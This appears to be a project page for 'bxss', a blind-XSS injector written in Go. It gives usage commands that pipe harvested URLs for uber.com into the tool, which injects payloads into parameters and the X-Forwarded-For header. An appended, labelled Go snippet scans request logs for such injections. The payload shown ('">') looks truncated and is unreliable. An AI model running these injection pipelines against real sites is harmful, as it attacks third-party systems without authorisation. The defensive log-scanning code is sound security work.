Bxss is a Blind XSS injector written in Go that helps us discover Blind XSS security gaps.
Features
Inserts Blind XSS payloads into custom headers
Inserts Blind XSS payloads into parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
Can be chained with other tools
Very fast
Easy to install
Installation
$ go get -u github.com/ethicalhackingplayground/bxss
Usage
Blind XSS In Parameters
$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '">' -parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '">' -header "X-Forwarded-For"
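A defender-side check for the two injection points shown above, as an added example that is not part of the bxss project: it scans request logs for X-Forwarded-For values that are not IP addresses and for query parameters whose decoded value carries markup characters. The tab-separated log format, the Scan function and the sample lines are assumptions constructed for illustration.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Scan reads tab-separated lines in an assumed format (method, request URI,
// X-Forwarded-For value or "-") and reports XFF entries that are not IP
// addresses and query parameters whose decoded value contains < > or ".
func Scan(lines []string) []string {
	var out []string
	for i, l := range lines {
		f := strings.Split(l, "\t")
		if len(f) != 3 {
			continue // not in the assumed format
		}
		for _, hop := range strings.Split(f[2], ",") {
			if f[2] != "-" && net.ParseIP(strings.TrimSpace(hop)) == nil {
				out = append(out, fmt.Sprintf("line %d header X-Forwarded-For=%q", i+1, f[2]))
				break
			}
		}
		u, err := url.ParseRequestURI(f[1])
		if err != nil {
			continue
		}
		for name, vals := range u.Query() { // Query() percent-decodes the values
			if v := strings.Join(vals, " "); strings.ContainsAny(v, "<>\"") {
				out = append(out, fmt.Sprintf("line %d param %s=%q", i+1, name, v))
			}
		}
	}
	return out
}

// sample is constructed for this example; it is not real traffic.
var sample = []string{
	"GET\t/search?q=shoes&page=2\t203.0.113.7",
	"POST\t/search?q=shoes%22%3E&page=2\t-",
	"OPTIONS\t/profile\t\">",
	"PUT\t/profile?id=4\t203.0.113.7, 198.51.100.2",
}

func main() {
	fmt.Println(strings.Join(Scan(sample), "\n"))
}
```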
You can download the program from here.